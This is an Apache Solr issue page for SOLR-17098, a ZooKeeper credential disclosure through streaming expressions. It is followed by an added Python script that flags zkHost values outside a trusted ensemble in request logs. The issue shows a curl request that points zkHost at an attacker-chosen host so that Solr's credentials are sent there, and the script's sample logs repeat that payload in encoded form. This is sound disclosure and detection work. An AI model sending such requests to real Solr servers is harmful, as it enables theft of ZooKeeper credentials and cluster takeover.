Solr / SOLR-17098

Zookeeper Credential Information Disclosure bug via Streaming Expressions

Details

    • Bug
    • Status: Closed
    • Blocker
    • Resolution: Fixed
    • None
    • 8.11.3, 9.4.1
    • streaming expressions
    • None

    Description

      Security list thread: https://lists.apache.org/thread/byrxkqk15mh6960wmx4r851srosgkvbh

       

      ZK Credentials and ACLs can be exposed to any endpoint when the Streaming Handler is used:

       

      curl --data-urlencode 'expr=search(collection1,
             zkHost="target:2121",
             qt="/export",
             q="*:*",
             fl="id,a_s,a_i,a_f",
             sort="a_f asc, a_i asc")' http://localhost:8983/solr/demo/stream

       

      In the command above, if the Solr instance has any Zookeeper Credentials or ACLs provided, then that information will be sent to the "target:2121" address. An attacker could set up a mock Zookeeper service to obtain the credentials, and then gain access to Solr's Zookeeper nodes.

      Attachments

        1. SOLR-17098.diff
          28 kB
          Houston Putman
        2. SOLR-17098-1.diff
          26 kB
          Houston Putman
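
A detection pass for the behaviour described above, as an added example that is not part of the original issue or of the Solr code base: it URL-decodes request-log lines, pulls out every zkHost value in a streaming expression, and reports hosts that are not in the cluster's own ZooKeeper ensemble. The trusted host names, the log-line layout and all function names are assumptions made for illustration; the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Assumption: the ZooKeeper ensemble this Solr cluster is configured to use.
TRUSTED_ZK_HOSTS = {"zk1.internal:2181", "zk2.internal:2181", "zk3.internal:2181"}

# zkHost="..." / zkHost='...' / bare zkHost=... ; matched loosely on purpose,
# because over-reporting is acceptable for a detection pass.
ZKHOST_RE = re.compile(
    r'zkHost\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^,)\s&}]+))', re.IGNORECASE)

def _decode(text, rounds=3):
    """URL-decode repeatedly so double-encoded parameters are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def zk_hosts_in(text):
    """Return every host:port named by a zkHost parameter in text."""
    hosts = []
    for m in ZKHOST_RE.finditer(_decode(text)):
        value = next(g for g in m.groups() if g is not None)
        connect = value.split("/", 1)[0]  # drop an optional chroot suffix
        hosts.extend(h.strip().lower() for h in connect.split(",") if h.strip())
    return hosts

def untrusted_zk_hosts(text, trusted=TRUSTED_ZK_HOSTS):
    """Hosts named by zkHost that are not part of the trusted ensemble."""
    allowed = {h.lower() for h in trusted}
    return [h for h in zk_hosts_in(text) if h not in allowed]

def scan(lines, trusted=TRUSTED_ZK_HOSTS):
    """Return (line_number, [untrusted hosts]) for each offending log line."""
    return [(n, bad) for n, line in enumerate(lines, 1)
            if (bad := untrusted_zk_hosts(line, trusted))]

# Constructed sample log lines (not taken from a real deployment).
SAMPLE_LOG = [
    'path=/stream params={expr=search(collection1,+zkHost%3D%22target:2121%22,+qt%3D%22/export%22,+q%3D%22*:*%22)} status=0',
    'path=/stream params={expr=search(collection1,+zkHost%3D%22zk1.internal:2181,zk2.internal:2181/solr%22,+q%3D%22*:*%22)} status=0',
    'path=/select params={q=*:*&rows=10} status=0',
    'path=/stream params={expr=search(collection1,zkHost%253D%2522203.0.113.7%253A2181%2522,q%253D%2522*%253A*%2522)} status=0',
]

if __name__ == "__main__":
    for line_no, hosts in scan(SAMPLE_LOG):
        print(f"line {line_no}: zkHost points outside the ensemble: {hosts}")
```

A hit on a deployment where ZooKeeper credentials or ACLs are configured is a reason to rotate those credentials, since the description above says they are sent to whatever address zkHost names.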

          People

            houston Houston Putman